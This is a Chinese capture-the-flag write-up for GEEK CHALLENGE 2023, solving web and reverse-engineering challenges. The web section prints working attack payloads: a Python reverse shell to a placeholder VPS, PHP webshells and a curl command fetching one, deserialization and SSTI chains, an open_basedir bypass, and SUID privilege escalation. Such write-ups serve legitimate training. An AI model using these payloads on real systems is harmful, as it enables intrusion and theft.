第十四届极客大挑战 GEEK CHALLENGE 2023‼️
开放注册:10月25日晚10点
比赛时间:10月26日晚8点-11月26日晚8点
平台链接:https://game.sycsec.com/
赛题范围包括re,web,pwn,crypto,misc等等,本届赛题还加入全新yak语言元素,方向多样,趣味性高。
本届更增添校外排行榜,校外的同学们组队参与也能获得名次奖励,欢迎大家前来挑战 💪。
Rank: 3
WEB
EzHttp
http签到,点击就送flag http://1.117.175.65:23333/
robots.txt 获取账号密码,再按步骤用几个请求头字段绕过:
1 | POST / HTTP/1.1 |
unsign
来签个到吧先
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
highlight_file(__FILE__);
class syc
{
public $cuit;
public function __destruct()
{
echo("action!<br>");
$function=$this->cuit;
return $function();
}
}
class lover
{
public $yxx;
public $QW;
public function __invoke()
{
echo("invoke!<br>");
return $this->yxx->QW;
}
}
class web
{
public $eva1;
public $interesting;
public function __get($var)
{
echo("get!<br>");
$eva1=$this->eva1;
$eva1($this->interesting);
}
}
if (isset($_POST['url']))
{
unserialize($_POST['url']);
}反序列化:
1 | from phpserialize import serialize |
POST:
url=O:3:"syc":1:{s:4:"cuit";O:5:"lover":2:{s:2:"QW";s:1:"x";s:3:"yxx";O:3:"web":2:{s:4:"eva1";s:6:"system";s:11:"interesting";s:7:"cat /f*";}}}
n00b_Upload
文件上传绕过:MIME、图片头、绕关键字
构造请求头:
1 | Content-Type: image/png |
上传成功后,访问 uploadtest/378845_653a63ea1370a.php?x=cat /flag 拿flag。
easy_php
学了php了,那就来看看这些绕过吧
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
header('Content-type:text/html;charset=utf-8');
error_reporting(0);
highlight_file(__FILE__);
include_once('flag.php');
if(isset($_GET['syc'])&&preg_match('/^Welcome to GEEK 2023!$/i', $_GET['syc']) && $_GET['syc'] !== 'Welcome to GEEK 2023!') {
if (intval($_GET['lover']) < 2023 && intval($_GET['lover'] + 1) > 2024) {
if (isset($_POST['qw']) && $_POST['yxx']) {
$array1 = (string)$_POST['qw'];
$array2 = (string)$_POST['yxx'];
if (sha1($array1) === sha1($array2)) {
if (isset($_POST['SYC_GEEK.2023'])&&($_POST['SYC_GEEK.2023']="Happy to see you!")) {
echo $flag;
} else {
echo "再绕最后一步吧";
}
} else {
echo "好哩,快拿到flag啦";
}
} else {
echo "这里绕不过去,QW可不答应了哈";
}
} else {
echo "嘿嘿嘿,你别急啊";
}
}else {
echo "不会吧不会吧,不会第一步就卡住了吧,yxx会瞧不起你的!";
}
第1层:换行符绕过;
第2层:科学计数法绕 intval();
第3层:sha1碰撞;
第4层:PHP解析特性。
1 | POST /?syc=Welcome%20to%20GEEK%202023!%0a&lover=2e5 HTTP/1.1 |
ctf_curl
命令执行?真的吗?
2
3
4
5
6
7
8
9
10
11
12
13
14
highlight_file('index.php');
// curl your domain
// flag is in /tmp/Syclover
if (isset($_GET['addr'])) {
$address = $_GET['addr'];
if(!preg_match("/;|f|:|\||\&|!|>|<|`|\(|{|\?|\n|\r/i", $address)){
$result = system("curl ".$address."> /dev/null");
} else {
echo "Hacker!!!";
}
}
利用VPS和curl写文件的参数:
?addr=-O%201.php%20x.x.x.x/1.txt
其中 1.txt 内容为:<?php system("cat /tmp/Syclover");?>
访问 1.php 得flag。
klf_ssti
De1ty的广东朋友跟女神表白被骂klf,现在气急败坏,你知道klf是什么意思嘛?他现在依旧觉得他不是klf你们才是,你能拿到flag证明他是klf嘛…
路由:/hack?klf=xxx
无过滤,但也无输出的SSTI盲打,利用python反弹shell到VPS:
/hack?klf={%print(config.__class__.__init__.__globals__['os'].popen('python3 -c \'a=__import__;s=a("socket").socket;o=a("os").dup2;p=a("pty").spawn;c=s();c.connect(("x.x.x.x",7777));f=c.fileno;o(f(),0);o(f(),1);o(f(),2);p("/bin/sh")\' ').read())%}
在根目录拿到flag。
ez_remove
我想要回炉重造一波,怎么说,难道你不想吗
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
highlight_file(__FILE__);
class syc{
public $lover;
public function __destruct()
{
eval($this->lover);
}
}
if(isset($_GET['web'])){
if(!preg_match('/lover/i',$_GET['web'])){
$a=unserialize($_GET['web']);
throw new Error("快来玩快来玩~");
}
else{
echo("nonono");
}
}
反序列化,用 S 绕关键字过滤,去最后大括号绕 Exception。
发现读不出根目录flag值,存在open_basedir,利用绕过命令读:
/?web=O:3:"syc":1:{S:5:"\6cover";s:142:"mkdir('test');chdir('test');ini_set('open_basedir','..');chdir('..');chdir('..');chdir('..');ini_set('open_basedir','/');readgzfile('/f1ger');";
ez_path
快来join我的博客吧!
源码注释:<!--secret在根目录f14444文件里面,别忘记了-->。
首页得到泄露的文件 app.cpython-39.pyc,反编译得python源码:
1 | import os, uuid |
利用绝对路径拼接漏洞:
os.path.join(path,*paths)函数用于将多个文件路径连接成一个组合的路径。第一个函数通常包含了基础路径,而之后的每个参数被当作组件拼接到基础路径之后。
然而,这个函数有一个少有人知的特性,如果拼接的某个路径以 / 开头,那么包括基础路径在内的所有前缀路径都将被删除,该路径将视为绝对路径。
os.path.join('articles/','/f14444')='/f14444'
故在 /upload 路由,POST title=/f14444&content=qwe,即可拿到flag。
you konw flask?
在驾校你不高低得当个教练?
扫描出 robots.txt,泄露信息:3ysd8.html,源码里有注释:
<!-- key是 app.secret_key = 'wanbao'+base64.b64encode(str(random.randint(1, 100)).encode('utf-8')).decode('utf-8')+'wanbao' (www,我可爱的菀宝,我存的够安全的吧) -->
制作爆破secret_key的字典:
1 | import base64 |
爆破flask session的secret_key:
flask-unsign --unsign --cookie 'eyJpc19hZG1pbiI6ZmFsc2UsIm5hbWUiOiJ4eHgiLCJ1c2VyX2lkIjozfQ.ZUOYig.x1sFiE5HRT9q5bGAwSF6wMnZfOM' --wordlist dict.txt
得到secret_key后,伪造admin的flask session:
flask-unsign --sign --cookie "{'is_admin': True, 'name': 'xxx', 'user_id': 3}" --secret 'wanbaoNTc=wanbao'
进入学员管理页面,找到flag:
既然你是教练,那这个flag学员就交给你吧 SYC{naCcuTYu2mu0c33Fen}
Pupyy_rce
这是什么?执行一下
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
highlight_file(__FILE__);
header('Content-Type: text/html; charset=utf-8');
error_reporting(0);
include(flag.php);
//当前目录下有好康的😋
if (isset($_GET['var']) && $_GET['var']) {
$var = $_GET['var'];
if (!preg_match("/env|var|session|header/i", $var,$match)) {
if (';' === preg_replace('/[^\s\(\)]+?\((?R)?\)/', '', $var)){
eval($_GET['var']);
}
else die("WAF!!");
} else{
die("PLZ DONT HCAK ME😅");
}
}
无参数RCE:?var=print_r(scandir(current(localeconv())));
得到:
Array ( [0] => . [1] => .. [2] => error.log [3] => fl@g.php [4] => genshin01.txt [5] => index.php [6] => tiangou01.txt [7] => tiangou02.txt )
访问 fl@g.php 得flag。
雨
VanZY给白月光写了一张明信片,快去帮他把id签上吧
访问 /source 没权限,提示 <!--Maybe you can view /hint-->。
访问 /hint,提示 I heard that the challenge maker likes to use his own id as secret_key。
使用jwt.io解析jwt,设置secret_key=VanZY,得到 /source 源码:
1 | const express = require('express'); |
在 /code 路由中使用了 putil_merge() ,结合putil-merge原型链污染漏洞(CVE-2021-23470),将 Super 污染,使得 /create 路由内的 Super['userrole'] === 'Superadmin' 成立:
1 | POST /code |
进入 /create 路由内,打ejs RCE(CVE-2022-29078),参考:ejs RCE CVE-2022-29078 bypass。
1 | POST /create HTTP/1.1 |
反弹shell,在VPS getshell,cat /Yupr0m1sing_f1ll4agggXD 得到flag:SYC{Chun_a1_M4n_NeVer_G1ve_Up}。
famale_imp_l0ve
”雌小鬼看了下o2takuXX师傅的马子说:”呐~就..就怎么长吗,真是杂鱼呢~❤”,你能来帮帮他吗?
根据源码注释,存在 include.php 文件:
1 |
|
结合首页文件上传和压缩的提示,考察zip文件包含。
首先新建一个zip文件,里面压缩着一个代码为 <?php system($_GET[x]); 的PHP脚本;然后构造 zip://php.zip#php.jpg:
/include.php?file=zip://php.zip%23php.jpg&x=cat /flag
即可得到flag。
change_it
快来找flag!(文件上传的目录为 “/upload”)
查看源代码得到用户名密码 user/user,其中有:
1 | <!-- 一直连不上?连不上就对啦! --> |
jwt伪造,爆破c-jwt-cracker:
./jwtcrack eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJpc3MiOiJRaW5nd2FuIiwibmFtZSI6InVzZXIiLCJhZG1pbiI6ImZhbHNlIn0.gzCFCz2Hw5c_EIjcM2lQ2QL3aDW3rAAHU2ZQ50_tnY4
得到 Secret is "yibao"
构造 {"iss": "Qingwan","name": "admin","admin": "true"} 对应的JWT:
eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJpc3MiOiJRaW5nd2FuIiwibmFtZSI6ImFkbWluIiwiYWRtaW4iOiJ0cnVlIn0.qs6tjnaghMXiTsvqEMUauz_JGzxxKdtaXPGVtQUEHek
根据前面 change.html 源码泄露的 php_mt_seed() 函数知文件名通过随机数更改,抓包,改文件名为1.php:
1 | POST /change.php HTTP/1.1 |
上传,同时爆破文件名:https://3v4l.org/UvLQQ#v8.0.30
1 |
|
得到的文件名,爆破其存在性:
1 | import requests |
访问即可得flag。
ezrfi
亲爱的Syclover,你能找到flag吗????
只能读py文件,试出 ?file=/var/hint
secret="w5YubyBvd08gMHcwIG92MCDDlndvIE8ubyAwLjAgMC5vIMOWdjAgMHbDliBPdjAgT3fDliBvLk8gw5Z2TyAwXzAgMF9PIG8uTyAwdjAgw5ZfbyBPd28gw5Z2TyDDli5PIMOWXzAgTy5PIMOWXzAgMHbDliAwLjAgw5Z2w5Ygw5Z3MCBPdsOWIMOWdjAgT1/DliDDlnZPIMOWLk8gw5Z3MCBvd8OWIMOWLm8gTy5vIMOWXzAgMHbDliDDlndvIE93w5YgTy5vIE93TyBvX28gw5YuTyBvLm8gb3dPIMOWXzAgb3dPIMOWXzAgMHZvIG8uTyBPd8OWIE92byAwLsOWIMOWdjAgTy7DliAwLjAgMHfDliBvLsOWIG93byBvdzAgMHZvIMOWLm8gb3dPIG9fMCDDli5PIG9fbyBPd8OWIE8ubyBvdzAgw5ZfbyBvd28gw5YuMCDDlnZPIG9fTyBPLsOWIE92MCBPdzAgby7DliAwdjAgT3YwIE9fTyBvLk8gT3bDliDDlnYwIMOWXzAgw5Z3byBvd08gT19vIE93w5Ygby5PIMOWdk8gby4wIDBfMCDDll9vIG93TyBPXzAgMC7DliDDli5vIE8uTyBPdzAgT19vIMOWdjAgb3cwIMOWdjAgT18wIMOWdm8gw5Z2w5Ygw5ZfbyAwX8OWIMOWdm8gw5Z2w5YgMHcwIE92w5Ygw5YubyDDli4wIMOWLm8gb3ZvIMOWLjAgw5YuMCAwd28gb3dPIG8uTyAwd8OWIDB2MCBvd8OWIMOWdzAgw5YubyAwdzAgT1/DliBvX08gw5Z2byAg"
base64解密得:
Ö.o owO 0w0 ov0 Öwo O.o 0.0 0.o Öv0 0vÖ Ov0 OwÖ o.O ÖvO 0_0 0_O o.O 0v0 Ö_o Owo ÖvO Ö.O Ö_0 O.O Ö_0 0vÖ 0.0 ÖvÖ Öw0 OvÖ Öv0 O_Ö ÖvO Ö.O Öw0 owÖ Ö.o O.o Ö_0 0vÖ Öwo OwÖ O.o OwO o_o Ö.O o.o owO Ö_0 owO Ö_0 0vo o.O OwÖ Ovo 0.Ö Öv0 O.Ö 0.0 0wÖ o.Ö owo ow0 0vo Ö.o owO o_0 Ö.O o_o OwÖ O.o ow0 Ö_o owo Ö.0 ÖvO o_O O.Ö Ov0 Ow0 o.Ö 0v0 Ov0 O_O o.O OvÖ Öv0 Ö_0 Öwo owO O_o OwÖ o.O ÖvO o.0 0_0 Ö_o owO O_0 0.Ö Ö.o O.O Ow0 O_o Öv0 ow0 Öv0 O_0 Övo ÖvÖ Ö_o 0_Ö Övo ÖvÖ 0w0 OvÖ Ö.o Ö.0 Ö.o ovo Ö.0 Ö.0 0wo owO o.O 0wÖ 0v0 owÖ Öw0 Ö.o 0w0 O_Ö o_O Övo
尊嘟假嘟解码:
Shy0JhFpsi+njV0IfFfzS44KIcwPFg312qo6gfdk0+DzcoMdSgVs15cERxpqnPJh4Y3b3i/mcbkPlHGTIA6/A8CQU8UX6j9w5HKy
根据提示RC4解码,key=Syclover,得:
文件包含逻辑是include($file.".py"),你能找到flag文件位置吗??
参考: LFI 新姿势学习,使用文件包含RCE:
1 | import requests |
EzRce
can you rce me??? flag中空格请用下划线替代
2
3
4
5
6
7
8
9
10
11
12
include('waf.php');
session_start();
show_source(__FILE__);
error_reporting(0);
$data=$_GET['data'];
if(waf($data)){
eval($data);
}else{
echo "no!";
}
盲试waf,为无字母数字RCE,异或可用,将每个字符异或 %A0 得到不可见字符。
phpinfo();:
?data=(%A0%A0%A0%A0%A0%A0%A0^%D0%C8%D0%C9%CE%C6%CF)();
看到disable_function禁用了:
exec,system,fwrite,passthru,popen,shell_exec,error_log,fputs,file_get_contents,assert,call_user_func,call_user_func_array,array_map,array_filter,array_reduce,get_defined_vars,getallheaders
读waf - readgzfile('waf.php');:
?data=(%A0%A0%A0%A0%A0%A0%A0%A0%A0%A0^%D2%C5%C1%C4%C7%DA%C6%C9%CC%C5)(%A0%A0%A0%A0%A0%A0%A0^%D7%C1%C6%8E%D0%C8%D0);
waf.php
1 |
|
写马 - file_put_contents('2.php','<?php eval($_POST[1]);');:
?data=(%A0%A0%A0%A0%A0%A0%A0%A0%A0%A0%A0%A0%A0%A0%A0%A0%A0^%C6%C9%CC%C5%FF%D0%D5%D4%FF%C3%CF%CE%D4%C5%CE%D4%D3)((%A0%A0%A0%A0%A0^%92%8E%D0%C8%D0),(%A0%A0%A0%A0%A0%A0%A0%A0%A0%A0%A0%A0%A0%A0%A0%A0%A0%A0%A0%A0%A0%A0^%9C%9F%D0%C8%D0%80%C5%D6%C1%CC%88%84%FF%F0%EF%F3%F4%FB%91%FD%89%9B));
蚁剑连接,find / -perm -u=s -type f 2>/dev/null 发现 /usr/bin/find 有 SUID权限,
find提权:
1 | cd /tmp |
得flag:SYC{ThE_RCe is S0 Eas1ly_DD!}
ezpython
can you pollute me?
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
import os
from waf import waf
import importlib
from flask import Flask,render_template,request,redirect,url_for,session,render_template_string
app = Flask(__name__)
app.secret_key='jjjjggggggreekchallenge202333333'
class User():
def __init__(self):
self.username=""
self.password=""
self.isvip=False
class hhh(User):
def __init__(self):
self.username=""
self.password=""
registered_users=[]
def hello_world(): # put application's code here
return render_template("welcome.html")
def play():
username=session.get('username')
if username:
return render_template('index.html',name=username)
else:
return redirect(url_for('login'))
def login():
if request.method == 'POST':
username=request.form.get('username')
password=request.form.get('password')
user = next((user for user in registered_users if user.username == username and user.password == password), None)
if user:
session['username'] = user.username
session['password']=user.password
return redirect(url_for('play'))
else:
return "Invalid login"
return redirect(url_for('play'))
return render_template("login.html")
def register():
if request.method == 'POST':
try:
if waf(request.data):
return "fuck payload!Hacker!!!"
data=json.loads(request.data)
if "username" not in data or "password" not in data:
return "连用户名密码都没有你注册啥呢"
user=hhh()
merge(data,user)
registered_users.append(user)
except Exception as e:
return "泰酷辣,没有注册成功捏"
return redirect(url_for('login'))
else:
return render_template("register.html")
def flag():
user = next((user for user in registered_users if user.username ==session['username'] and user.password == session['password']), None)
if user:
if user.isvip:
data=request.args.get('num')
if data:
if '0' not in data and data != "123456789" and int(data) == 123456789 and len(data) <=10:
flag = os.environ.get('geek_flag')
return render_template('flag.html',flag=flag)
else:
return "你的数字不对哦!"
else:
return "I need a num!!!"
else:
return render_template_string('这种神功你不充VIP也想学?<p><img src="{{url_for(\'static\',filename=\'weixin.png\')}}">要不v我50,我送你一个VIP吧,嘻嘻</p>')
else:
return "先登录去"
def merge(src, dst):
for k, v in src.items():
if hasattr(dst, '__getitem__'):
if dst.get(k) and type(v) == dict:
merge(v, dst.get(k))
else:
dst[k] = v
elif hasattr(dst, k) and type(v) == dict:
merge(v, getattr(dst, k))
else:
setattr(dst, k, v)
if __name__ == '__main__':
app.run(host="0.0.0.0",port="8888")
代码中有 merge() 函数,参考:Python原型链污染变体(prototype-pollution-in-python)
waf中包含 isvip,使用Unicode编码绕过关键字过滤。
对路由 /register,POST {"username":"xx","password":"yy","__class__" : {"__base__" : {"is\u0076ip" : 1}}}
再登录访问 /flag,用 + 绕过判断:/flag?num=+123456789,查看源码得到flag。
ez_php
我的女神呢?快帮我找找
源码在 havefun.php:
1 |
|
先反序列化 useless 类的 __destruct() 拿到 key.php:
用 ArrayObject 绕过 /^[Oa]:[\d]+/i,md5碰撞,再根据 and 的优先级无视 $random:
C:11:"ArrayObject":196:{x:i:0;O:7:"useless":2:{s:2:"QW";s:64:"M%C9h%FF%0E%E3%5C%20%95r%D4w%7Br%15%87%D3o%A7%B2%1B%DCV%B7J%3D%C0x%3E%7B%95%18%AF%BF%A2%00%A8%28K%F3n%8EKU%B3_Bu%93%D8Igm%A0%D1U%5D%83%60%FB_%07%FE%A2";s:3:"YXX";s:64:"M%C9h%FF%0E%E3%5C%20%95r%D4w%7Br%15%87%D3o%A7%B2%1B%DCV%B7J%3D%C0x%3E%7B%95%18%AF%BF%A2%02%A8%28K%F3n%8EKU%B3_Bu%93%D8Igm%A0%D1%D5%5D%83%60%FB_%07%FE%A2";};m:a:0:{}}
basename() 绕过 $_SERVER['PHP_SELF']:
/havefun.php/key.php?user=C:11:%22ArrayObject%22:196:{x:i:0;O:7:%22useless%22:2:{s:2:%22QW%22;s:64:%22M%C9h%FF%0E%E3%5C%20%95r%D4w%7Br%15%87%D3o%A7%B2%1B%DCV%B7J%3D%C0x%3E%7B%95%18%AF%BF%A2%00%A8%28K%F3n%8EKU%B3_Bu%93%D8Igm%A0%D1U%5D%83%60%FB_%07%FE%A2%22;s:3:%22YXX%22;s:64:%22M%C9h%FF%0E%E3%5C%20%95r%D4w%7Br%15%87%D3o%A7%B2%1B%DCV%B7J%3D%C0x%3E%7B%95%18%AF%BF%A2%02%A8%28K%F3n%8EKU%B3_Bu%93%D8Igm%A0%D1%D5%5D%83%60%FB_%07%FE%A2%22;};m:a:0:{}}&a=PHP_SELF
得到图片,信息是 key=9:
最后再来一次反序列化链调用:
1 | Me:__wakeup() (引用) |
1 |
|
phpinfo(),修改引用11为13:
C:11:%22ArrayObject%22:260:{x:i:0;O%3A2%3A%22Me%22%3A3%3A%7Bs%3A3%3A%22qwe%22%3BO%3A3%3A%22her%22%3A3%3A%7Bs%3A12%3A%22%00her%00hername%22%3BN%3Bs%3A8%3A%22%00her%00key%22%3BN%3Bs%3A3%3A%22asd%22%3BO%3A9%3A%22important%22%3A1%3A%7Bs%3A5%3A%22power%22%3BO%3A7%3A%22useless%22%3A3%3A%7Bs%3A15%3A%22%00useless%00seeyou%22%3Ba%3A1%3A%7Bs%3A6%3A%22seeyou%22%3Bs%3A7%3A%22phpinfo%22%3B%7Ds%3A2%3A%22QW%22%3BN%3Bs%3A3%3A%22YXX%22%3BN%3B%7D%7D%7Ds%3A3%3A%22bro%22%3BN%3Bs%3A6%3A%22secret%22%3BR%3A13%3B%7D;m:a:0:{}}
修改引用16为18,改hez为her:
C:11:%22ArrayObject%22:351:{x:i:0;O%3A2%3A%22Me%22%3A3%3A%7Bs%3A3%3A%22qwe%22%3BO%3A3%3A%22her%22%3A3%3A%7Bs%3A12%3A%22%00her%00hername%22%3BN%3Bs%3A8%3A%22%00her%00key%22%3BN%3Bs%3A3%3A%22asd%22%3BO%3A9%3A%22important%22%3A1%3A%7Bs%3A5%3A%22power%22%3BO%3A7%3A%22useless%22%3A3%3A%7Bs%3A15%3A%22%00useless%00seeyou%22%3Ba%3A1%3A%7Bs%3A6%3A%22seeyou%22%3Ba%3A2%3A%7Bi%3A0%3BO%3A3%3A%22her%22%3A3%3A%7Bs%3A12%3A%22%00her%00hername%22%3Bs%3A4%3A%22momo%22%3Bs%3A8%3A%22%00her%00key%22%3Bs%3A1%3A%229%22%3Bs%3A3%3A%22asd%22%3BN%3B%7Di%3A1%3Bs%3A4%3A%22find%22%3B%7D%7Ds%3A2%3A%22QW%22%3BN%3Bs%3A3%3A%22YXX%22%3BN%3B%7D%7D%7Ds%3A3%3A%22bro%22%3BN%3Bs%3A6%3A%22secret%22%3BR%3A18%3B%7D;m:a:0:{}}
最终payload,列目录:
?user=C:11:%22ArrayObject%22:351:{x:i:0;O%3A2%3A%22Me%22%3A3%3A%7Bs%3A3%3A%22qwe%22%3BO%3A3%3A%22her%22%3A3%3A%7Bs%3A12%3A%22%00her%00hername%22%3BN%3Bs%3A8%3A%22%00her%00key%22%3BN%3Bs%3A3%3A%22asd%22%3BO%3A9%3A%22important%22%3A1%3A%7Bs%3A5%3A%22power%22%3BO%3A7%3A%22useless%22%3A3%3A%7Bs%3A15%3A%22%00useless%00seeyou%22%3Ba%3A1%3A%7Bs%3A6%3A%22seeyou%22%3Ba%3A2%3A%7Bi%3A0%3BO%3A3%3A%22her%22%3A3%3A%7Bs%3A12%3A%22%00her%00hername%22%3Bs%3A4%3A%22momo%22%3Bs%3A8%3A%22%00her%00key%22%3Bs%3A1%3A%229%22%3Bs%3A3%3A%22asd%22%3BN%3B%7Di%3A1%3Bs%3A4%3A%22find%22%3B%7D%7Ds%3A2%3A%22QW%22%3BN%3Bs%3A3%3A%22YXX%22%3BN%3B%7D%7D%7Ds%3A3%3A%22bro%22%3BN%3Bs%3A6%3A%22secret%22%3BR%3A18%3B%7D;m:a:0:{}}&file=data://text/plain,loveyou&fun=glob://f*
POST: ctf=DirectoryIterator
得到flag文件名为 flag_my_baby.php。
再读flag文件:
?user=C:11:%22ArrayObject%22:351:{x:i:0;O%3A2%3A%22Me%22%3A3%3A%7Bs%3A3%3A%22qwe%22%3BO%3A3%3A%22her%22%3A3%3A%7Bs%3A12%3A%22%00her%00hername%22%3BN%3Bs%3A8%3A%22%00her%00key%22%3BN%3Bs%3A3%3A%22asd%22%3BO%3A9%3A%22important%22%3A1%3A%7Bs%3A5%3A%22power%22%3BO%3A7%3A%22useless%22%3A3%3A%7Bs%3A15%3A%22%00useless%00seeyou%22%3Ba%3A1%3A%7Bs%3A6%3A%22seeyou%22%3Ba%3A2%3A%7Bi%3A0%3BO%3A3%3A%22her%22%3A3%3A%7Bs%3A12%3A%22%00her%00hername%22%3Bs%3A4%3A%22momo%22%3Bs%3A8%3A%22%00her%00key%22%3Bs%3A1%3A%229%22%3Bs%3A3%3A%22asd%22%3BN%3B%7Di%3A1%3Bs%3A4%3A%22find%22%3B%7D%7Ds%3A2%3A%22QW%22%3BN%3Bs%3A3%3A%22YXX%22%3BN%3B%7D%7D%7Ds%3A3%3A%22bro%22%3BN%3Bs%3A6%3A%22secret%22%3BR%3A18%3B%7D;m:a:0:{}}&file=data://text/plain,loveyou&fun=php://filter/convert.base64-encode/resource=flag_my_baby.php
POST: ctf=SplFileObject
结果base64解码即得flag。
scan_tool
nmap也太好用了!不是吧,你还不会用吗?
过滤了 ? php flag iL oN
使用nmap读文件,选项 -oA,该选项可将扫描结果以标准格式、XML格式和Grep格式一次性保存,分别放在.nmap,.xml和.gnmap文件中。
使用 ?ip=127.0.0.1' -i /fl""ag -oA 1 ',再访问 1.nmap 得到flag。
klf_2
”可恶,我不信,我绝对不是klf,你们才是,哈哈这次我卷土重来了,你们肯定是klf,我要向女神证明自己…“
robots.txt 得路由 /secr3ttt,测试过滤关键字有:
[ ] _ ' " \ config init globals os import request open read 0 137 pop
列目录:
1 | {% set pp=dict(po=a,p=a)|join%} |
得到flag文件名 fl4gfl4gfl4g,再读flag文件:
1 | {% set pp=dict(po=a,p=a)|join%} |
EZ_Smuggling
这是一个简单的H2转H1的小网站,站长认为他很安全,没有人能在他的网站走私任何东西。 题目链接:https://47.108.56.168:20231/ 备用链接1:https://47.108.56.168:20232/ 备用链接2:https://47.108.56.168:20233/
H2.CL请求走私,参考:
HTTP Request Smuggling – HTTP/2 Downgrade Attack Part 2
构造:
1 | GET / HTTP/2 |
即可得flag:SYC{http2_5muggl1ng_15_1nt3r3st1ng}。
klf_3
”好好好这都给你们做出来了,这次我拜托了pursue0h帮我收集了你们前几次的payload,这次绝对不可能让你们做出来,你们绝对是klf“
robots.txt 得到路由 /secr3ttt,同klf_2相同打法即可。
列目录:
1 | {% set pp=dict(po=a,p=a)|join%} |
得到flag文件名 fl4gfl4gfl4g,再读flag文件:
1 | {% set pp=dict(po=a,p=a)|join%} |
Akane!
最适合梅菲斯特的一题
glob协议侧信道爆破文件名。
1 | from phpserialize import serialize |
1 | import requests |
再访问 /var/www/html/TheS4crEtF1AgFi1EByo2takuXX.php 即可得flag。
RE
shiftjmp
跳到哪里去了?
用IDA解析程序崩溃,改用Ghidra解析:
1 | undefined8 main(void) |
逻辑为简单异或操作,还原:
1 | rodata = list(bytes.fromhex('5358417853366a6438646f547842517b78224d61276373452d7c456c2c6f2f7b5e5c')) |
点击就送的逆向题
代码如何到可执行二进制文件?(记得将得到的正确字符串包裹上SYC{}!!!!!!!)
将s文件编译:gcc xxx.s -o xxx
关键代码:
1 | v7 = __readfsqword(0x28u); |
逻辑为ROT7,cyberchef还原为 SYCTQWEFGHYIICIOJKLBNMCVBFGHSDFF。
flag:SYC{SYCTQWEFGHYIICIOJKLBNMCVBFGHSDFF}
easymath
别担心,没学过线性代数也可以做出来,听说z3老师很厉害。flag请使用SYC{}包裹。
前部分代码为 $\mathbb{Z}_{32}$ 下矩阵乘法:$L \cdot M = I$
后部分代码,根据代码测试代码逻辑:
1 | flag = 'c01234_asdzxpoityumnbAOZWXGMY' |
逻辑为将flag按照num来编序号。
还原脚本:
1 | M = matrix(Zmod(32), [[18, 29, 16, 19, 27], [8, 31, 8, 23, 30], [29, 3, 28, 10, 21], [18, 29, 8, 16, 28], [11, 30, 7, 20, 7]]) |
flag:SYC{xtd4co_ymiunbbx3Aypsmbzii}
幸运数字
试试今天的运势
按逻辑还原:
1 | data = [13, 7, 29, 37, 29, 110, 48, 57, 44, 63, |
听说cpp很难?
xxx师傅偶然听到有人说cpp很难,真的很难吗?不会吧,不会吧。于是,X师傅连忙出了一道给大伙儿涨涨信心。
动调,得到逻辑为 $[(9+1) \oplus (f_i+10)]-9-1$。
爆破还原:
1 | c = [77, 95, 61, -123, 55, 104, 115, 87, 39, 104, 81, 89, 127, 38, 107, 89, 115, 87, 85, 91, 89, 111, 106, 89, 39, 87, 114, 87, 79, 87, 120, 120, -125] |
flag:SYC{Anma1nG_y0u_maKe_it_1alaIa~~}
砍树
你会安卓吗?我反正不会
jadx查看apk,用IDA在so文件中查看主要逻辑:
1 | _BOOL8 __fastcall Java_com_sky_ezreeeee_MainActivity_I0o0I(__int64 a1, __int64 a2, __int64 a3, __int64 a4) |
简单异或运算,提取密文:002020171B360E362617042A2907261552332D0F3A271106330746173D0A3C382E2218,密钥:Syclove,Cyberchef异或操作得 SYC{t@ke_thE_bul1_By_the_h0rns_TAT}。
flower-or-tea
Flower ?or tea? or flower tea?
去除jmp花指令,全局替换 74 03 75 01 XX 为 90 90 90 90 90 (NOP)。
看伪码为魔改XTEA算法。
1 | from Crypto.Util.number import * |
mySelf
Why so serious?
动调,得到第二个对输入的加密逻辑为TEA算法。
1 | from Crypto.Util.number import * |
rainbow
美丽的IDA控制流视图 like Rainbow!
LLVM去平坦化:
python3 deflat.py -f ./rainbow --addr 0x401160
再简单逆回去:
1 | from Crypto.Util.number import * |
小黄鸭
小黄鸭的钥匙被一个叫毗外的大坏鸭偷走了,你能帮它找到钥匙吗?
python反编译,得到1.pyc,修复为3.7的文件头 550d0d0a,还原python代码。
密文:~h|p4gs`gJdN`thPwR`jDn`te1w`2|RNH
Cyberchef解:ROT93+Reverse+ROT12
得到:SYC{1_h0pe_yOu_ChAse_YoUr_dr3a{s}
修正一下得flag:SYC{1_h0pe_yOu_ChAse_YoUr_dr3ams}
寻找初音未来
正确的输入即可解救Miku~(图有点大了忍一下)
Go程序,代码逻辑为RC4,动调得 key='C'*18。
输入问题 初音未来色是多少?(输入为16进制,如0x123abc则输入123abc) 答案 39C5BB,提取密文,RC4解密:
1 | N = 256 |
浪漫至死不渝
某师傅想给他的女神表白,他写了一个网站,点爱心之后就能输入密码,但是在写的过程中他不小心把提示的密码删除了,你能帮他找出表白密码吗?(输入密码时,记得刷新喔) ps:请将密码包裹SYC{}上交,且将字母全改为大写
js文件加密逻辑分析。
key为Text1,采用了栅栏密码加密得到 53X211WH04N,利用现有的 decryptRailFence() 函数解密:
decryptRailFence('53X211WH04N',3)='5201314WXHN'
密文为:125, 130, 131, 122, 117, 110, 123, 125, 130, 131, 122, 117, 110, 123, 99, 99, 99, 99
加密逻辑为:
1 | i<14 时:c[i]=(m[i]^k[i%7])+10 |
还原明文代码:
1 | c = [125, 130, 131, 122, 117, 110, 123, 125, 130, 131, 122, 117, 110, 123, 99, 99, 99, 99] |
flag:SYC{FJIAXUEFJIAXUEWXHN}
AES! AES?
What’s this ?
照逻辑尝试逆向即可。
1 | import math |
ezandroid
喂!三点几啦!饮茶先啦! (flag需要包上SYC{}提交)
在MainActivity中查看逻辑为:
1 | obj 补足24位 X |
加密逻辑为魔改TEA:
1 | from Crypto.Util.number import * |
